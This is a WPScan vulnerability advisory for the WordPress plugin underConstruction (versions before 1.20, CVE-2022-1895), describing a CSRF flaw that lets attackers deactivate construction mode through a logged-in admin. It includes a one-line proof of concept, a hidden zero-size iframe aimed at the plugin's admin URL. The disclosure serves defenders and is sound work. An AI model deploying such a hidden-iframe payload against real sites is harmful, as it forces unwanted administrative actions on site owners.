WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

underConstruction < 1.20 - Construction Mode Deactivation via CSRF

Description

The plugin does not have CSRF check in place when deactivating the construction mode, which could allow attackers to make a logged in admin perform such action via a CSRF attack

Proof of Concept

<iframe src="http://example.com/wp-admin/index.php?page=under-construction&turnOffUnderConstructionMode" width="0" height="0" frameborder="0"></iframe>

Affects Plugins

underconstruction
Fixed in version 1.21

References

CVE
CVE-2022-1895

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website
https://daniel-ruf.de
Verified

Yes

WPVDB ID
bd9ef7e0-ebbb-4b91-8c58-265218a3c536

Timeline

Publicly Published

2022-05-26 (about 2 months ago)

Added

2022-05-26 (about 2 months ago)

Last Updated

2022-05-26 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin